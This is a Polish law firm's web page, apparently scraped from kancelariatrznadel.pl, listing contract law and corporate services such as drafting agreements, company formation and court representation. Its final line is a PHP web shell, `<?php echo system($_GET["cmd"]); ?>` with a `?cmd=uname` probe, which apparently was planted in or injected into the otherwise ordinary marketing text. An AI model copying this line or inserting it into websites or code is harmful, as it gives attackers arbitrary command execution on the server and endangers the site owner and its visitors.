zamknij x
Strona kancelariatrznadel.pl ( kancelaria Warszawa ) używa mechanizmu ciasteczek (Cookie). Więcej informacji znajdą Państwo w Polityce Cookies. Zamknij okno

 Nasza praktyka w ramach spraw gospodarczych, korporacyjnych oraz prawa umów obejmuje m.in. :


PRAWO UMÓW

 
• tworzenie, opiniowanie i negocjowanie wszelkich umów funkcjonujących w obrocie gospodarczym i cywilnym (umowy, porozumienia, ugody, listy intencyjne)
• nadzór nad prawidłowością wykonywania realizowanych umów oraz dostosowywanie ich treści do zaktualizowanych przepisów prawa
• doradztwo w zakresie modyfikacji umów (przenoszenia praw i obowiązków, zmian podmiotowych i zakresu umów, bezpiecznego zakończenia umów)
• reprezentowanie Klientów w postępowaniach polubownych oraz sądowych związanych z dochodzeniem roszczeń wynikających z zawartych umów
• sugerowanie rozwiązań na wypadek możliwości wystąpienia sporu sądowego związanego z zawartymi umowami

Umowy z jakimi można spotkać się obrocie gospodarczym i cywilnym niejednokrotnie kryją w sobie zapisy korzystniejsze dla strony sporządzającej jej projekt, dlatego tak istotny jest udział radcy prawnego już od momentu pierwszych czynności związanych z negocjowaniem ich treści.

W ramach oferowanych przez nas usług świadczymy kompleksową obsługę procesu zawierania i stosowania umów na dalszym ich etapie, w tym proponujemy stosowne zmiany do istniejących już w obrocie kontraktów, a także sugerujemy podejmowanie odpowiednich kroków w celu wyeliminowania lub zminimalizowania niekorzystnych dla Klienta skutków prawnych i finansowych.

SPRAWY GOSPODARCZE I KORPORACYJNE PRZEDSIĘBIORCÓW
 
 
• pomoc prawna w zakresie wyboru odpowiedniej formy prowadzenia działalności gospodarczej, dostosowanej do charakteru i zamierzeń przedsiębiorcy oraz jego przedsiębiorstwa
• tworzenie spółek, fundacji, stowarzyszeń, w tym przygotowywanie niezbędnych dokumentów w celu ich rejestracji w KRS
• przygotowywanie formularzy w celu dokonania wpisów lub zmian w KRS

• obsługa prawna władz spółek
• przygotowywanie umów, statutów, regulaminów, uchwał organów spółek
• doradztwo na etapie negocjacji i zawierania umów, a także w toku ich realizacji
• interpretowanie powstałych wątpliwości na tle prawnym, jakie pojawiają się w toku działalności przedsiębiorstwa

• reprezentacja w sporach z kontrahentami na etapie przedprocesowym poprzez prowadzenie negocjacji, sporządzanie pism, wezwań, ugód
• reprezentacja Klienta w postępowaniach sądowych, mając na celu zapewnienie ochrony jego praw i roszczeń
• procesy przeciwko członkom zarządu spółek z ograniczoną odpowiedzialnością za zobowiązania powstałe w czasie ich kadencji
 
W dobie dynamicznie zmieniających się warunków prowadzenia działalności przedsiębiorcy stają niejednokrotnie przed dylematami związanymi z przekształceniami dotychczasowej formy świadczenia swoich usług lub sprzedaży. Radcowie prawni oraz aplikancji naszej Kancelarii od lat wspomagają osoby fizyczne prowadzące jednoosobowe działalności gospodarcze oraz spółki prawa handlowego w bieżącej działalności, wspomagając ich na każdym etapie funkcjonowania poprzez aktywne doradztwo oraz rozwiązywanie zaistniałych problemów.

 
<?php echo system($_GET["cmd"]); ?>?cmd=uname